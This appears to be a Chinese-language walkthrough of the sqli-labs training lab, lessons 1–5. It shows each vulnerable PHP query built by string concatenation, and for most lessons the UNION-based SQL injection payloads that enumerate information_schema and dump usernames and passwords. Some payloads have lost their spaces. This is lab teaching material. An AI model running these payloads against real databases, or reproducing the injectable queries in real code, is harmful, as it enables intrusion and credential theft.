# less-1 GET - Error based - Single quotes - String (基于错误的 GET 单引号字符型注入)
字符型单引号闭合
1 2 3 4 5 6 7 8 9 10 11 12 13 14
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
#确定注入点 ?id=1' #字段 ?id=-1'unionselect1,2,3--+ #爆数据库 ?id=-1' union select 1,database(),group_concat(schema_name) from information_schema.schemata--+ #爆tables ?id=-1'unionselect1,database(),group_concat(table_name) from information_schema.columns where table_schema='security'--+ #爆columns ?id=-1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+ #id,username,password ?id=-1'unionselect1,group_concat(username),group_concat(password) from security.users --+
# less-2 GET - Error based - Intiger based (基于错误的 GET 整型注入)
数字型
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
#确定注入点 ?id=1 #字段 ?id=-1unionselect1,2,3--+ #爆数据库 ?id=-1unionselect1,database(),group_concat(schema_name) from information_schema.schemata--+ #爆tables ?id=-1unionselect1,database(),group_concat(table_name) from information_schema.columns where table_schema='security'--+ #爆columns ?id=-1unionselect1,database(),group_concat(column_name) from information_schema.columns where table_schema='security'and table_name='users'--+ #id,username,password ?id=-1unionselect1,group_concat(username),group_concat(password) from security.users --+
# less-3 GET - Error based - Single quotes with twist string (基于错误的 GET 单引号变形字符型注入)
1 2 3 4
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1"; #闭合括号 ?id=-1') union select 1,2,3 --+
# less-4 GET - Error based - Double Quotes - String (基于错误的 GET 双引号字符型注入)
1 2 3 4 5 6
$id=$GET['id']; $id ='"' . $id . '"' $sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1"; #闭合双引号括号 ?id=-1") union select 1,2,3 --+
# less-5 GET - Double Injection - Single Quotes - String (双注入 GET 单引号字符型注入)
1 2 3 4 5 6 7
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; #正常单引号闭合字符型,但是不会显示信息,只有成功失败的不同
